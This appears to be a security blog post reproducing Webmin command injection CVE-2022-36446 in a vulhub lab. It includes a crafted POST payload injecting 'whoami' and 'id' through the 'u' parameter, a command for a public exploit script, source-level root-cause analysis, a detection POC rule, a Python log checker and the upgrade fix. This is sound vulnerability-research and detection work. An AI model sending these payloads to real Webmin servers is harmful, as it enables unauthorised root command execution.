Network Security: Command Execution Vulnerability Reproduction (Webmin, CVE-2022-36446)

0x01 Vulnerability Introduction

Vulnerability Level: Critical

Webmin is the most powerful web-based Unix system administration tool. The administrator accesses Webmin's management functions through a browser and performs the corresponding administrative actions. Webmin versions before 1.997 contain an arbitrary command injection vulnerability; triggering it requires logging in to Webmin.

0x02 Affected Versions

Webmin versions earlier than 1.997

0x03 Exploit Conditions

  • The vulnerability requires authentication;

  • The account must have permission to use the "Software Package Updates" module, because that module is where the vulnerability is triggered.

0x04 Vulnerability Reproduction

Environment setup

1. Use vulhub to build the environment: download vulhub to the local machine.

2. Enter vulhub/webmin/CVE-2019-15107; this environment is reused to reproduce CVE-2022-36446.

```shell
docker-compose up -d   # start the vulnerable environment
docker-compose ps      # show the ports mapped by the vulnerable environment
```


3. Open https://ip:10000; if the Webmin login page appears, the environment was deployed successfully.

4. Next, the Webmin password must be changed, which is done from inside the container.

```shell
docker ps                                 # find the container id of the vulnerable environment
docker exec -it <container id> /bin/bash  # enter the container
cd /usr/share/webmin/                     # go to /usr/share/webmin/ inside the container
./changepass.pl /etc/webmin root root     # set the root password to "root"
```

Vulnerability reproduction

1. After the above settings are completed, use root/root to log in to webmin.

2. After logging in, capture any request.

3. Send it to the Repeater module and change the request method to POST.

4. Change the request path to /package-updates/update.cgi, add the payload below, and send the request; the response contains the output of the executed command.

```
mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
```

```http
POST /package-updates/update.cgi HTTP/1.1
Host: X.X.X.X:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-From: mount
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://X.X.X.X:10000/mount/?xnavigation=1
Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

mode=new&search=ssh&redir=&redirdesc=&u=0%3Bid%3B&confirm=Install%2BNow
```

EXP

The vulnerability can also be exploited directly with a script; EXP address: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE .

```shell
python3 CVE-2022-36446.py -t https://X.X.X.X:10000/ -u root -p root -k -I
```

If the script fails with a parser error, change every `soup = BeautifulSoup(r.content, 'lxml')` in CVE-2022-36446.py to `soup = BeautifulSoup(r.content, 'html.parser')` and run it again.

Vulnerability analysis

Command execution:

When an application needs to call an external program to process some content, it uses functions that execute system commands, such as the common system, exec and shell_exec functions in PHP. When the user can control the parameters passed to such a function, malicious system commands can be injected into the normal command, resulting in a command execution attack.

Webmin is currently the most powerful web-based Unix system management tool. Administrators access various management functions of webmin through a browser and complete corresponding management actions.

Webmin uses the operating system's package manager (apt, yum, etc.) to update and install packages. Because of missing input sanitization (software/apt-lib.pl in Webmin before 1.997 lacks escaping for a UI command), arbitrary commands can be injected and are appended to the package manager invocation.

The vulnerability requires authentication, and the account must have permission to use the package update module. A user can then execute system commands while installing a new package, and those commands run with root privileges.

The module lives in the /package-updates/ folder. Its update.cgi file reads the user-supplied package name from the parameter "u" on line 39 and checks for the presence of the "confirm" parameter in the request on line 50. On line 57, if the request has no "confirm" parameter, the "list_package_operations()" function is called with the variable "pkgnames", which holds the package names.

Line 4 of /package-updates/update.cgi shows that the "list_package_operations" function comes from the file "package-updates-lib.pl".

"list_package_operations()" is defined on line 408 of package-updates-lib.pl. On line 412 this function passes the value of "$name", which is the package name, to the "update_system_operations()" function in the software module.

Searching for update_system_operations() shows that the function is defined in the files apt-lib.pl and yum-lib.pl.

As the names suggest, apt-lib.pl uses the apt package manager and yum-lib.pl uses yum. Both do the same work; only some of the commands differ, depending on the operating system running Webmin and its package manager, so either file can be analyzed.

In /software/apt-lib.pl, update_system_operations() is defined on line 75. Line 83 runs the system command through the "backquote_command()" function, which also controls the safety of the command the system runs and therefore prevents command injection at this point.

Returning to update.cgi: if a package needs to be installed, the "package_install()" function is called on line 129.

Searching shows that package_install() is located at line 300 of "package-updates-lib.pl". On line 345 it calls the "update_system_install()" function with the "$name" variable, which is the package name supplied by the user (as established above, these functions are defined in apt-lib.pl).

Check apt-lib.pl again for the related function.

On line 18 the function's first argument (the package name the user sent earlier) is assigned to the "update" variable. On line 26 the "update" variable is concatenated into the command without any control mechanism, and on line 46 the resulting command is executed directly on the system, again without any control mechanism.

So a user can execute commands on the system with root privileges by sending a new package install request that includes the "confirm" parameter and supplies, as the package name, a value that runs a command on the system.

0x05 Writing a Detection POC Rule

```yaml
params:
- mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
name: Webmin命令执行漏洞(CVE-2022-36446)
set: {}
rules:
- method: POST
  path: /package-updates/update.cgi
  headers:
    Cookie: redirect=1; testing=1; sid=75eb9d34c1642057244dc271fb980bf6
  body: mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b"root")
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
```
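Besides an active POC, the analysis above (the "u" value flows unescaped into the apt command when "confirm" is present) also gives a passive check for proxy or WAF logs. The following Python is an added example, not code from the original post or from Webmin; the package-name grammar (Debian policy names) and the sample requests are constructed assumptions, and a strict Webmin deployment may send "u" values in a different form, so tune the regex to the package manager in use.

```python
import re
from urllib.parse import parse_qs

# Assumed grammar: Debian package names are lowercase alphanumerics plus
# '+', '-', '.', at least two characters long, starting alphanumeric.
# Shell metacharacters such as ';' or '|' can never appear in a real name.
PKG_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9+.\-]+$")


def parse_request(raw: str):
    """Split a raw CRLF-delimited HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def suspicious_package_names(raw: str):
    """Return the 'u' values of a Software Package Updates install request that
    cannot be package names; empty list for benign or non-install requests."""
    method, path, _, body = parse_request(raw)
    if method != "POST" or not path.startswith("/package-updates/update.cgi"):
        return []
    params = parse_qs(body, keep_blank_values=True)
    if "confirm" not in params:  # without confirm only the listing branch runs
        return []
    return [u for u in params.get("u", []) if not PKG_NAME_RE.match(u)]


def build_request(body: str) -> str:
    """Constructed sample request modelled on the capture above (sid redacted)."""
    return (
        "POST /package-updates/update.cgi HTTP/1.1\r\n"
        "Host: X.X.X.X:10000\r\n"
        "Cookie: redirect=1; testing=1; sid=REDACTED\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n" + body
    )


SAMPLE_MALICIOUS = build_request(
    "mode=new&search=ssh&redir=&redirdesc=&u=0%3Bwhoami%3B&confirm=Install%2BNow")
SAMPLE_BENIGN = build_request(
    "mode=new&search=ssh&redir=&redirdesc=&u=ssh&confirm=Install%2BNow")

if __name__ == "__main__":
    print("malicious:", suspicious_package_names(SAMPLE_MALICIOUS))  # ['0;whoami;']
    print("benign:", suspicious_package_names(SAMPLE_BENIGN))        # []
```

The same check can be applied at the code level: a package name that fails this grammar should be rejected before it ever reaches the apt command line, which is the input sanitization the vulnerable apt-lib.pl lacked.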


0x06 Fix

1. Upgrade to version 1.997 or later.

2. Obtain and apply the vendor patch.

Source: blog.csdn.net/jazzz98/article/details/130083327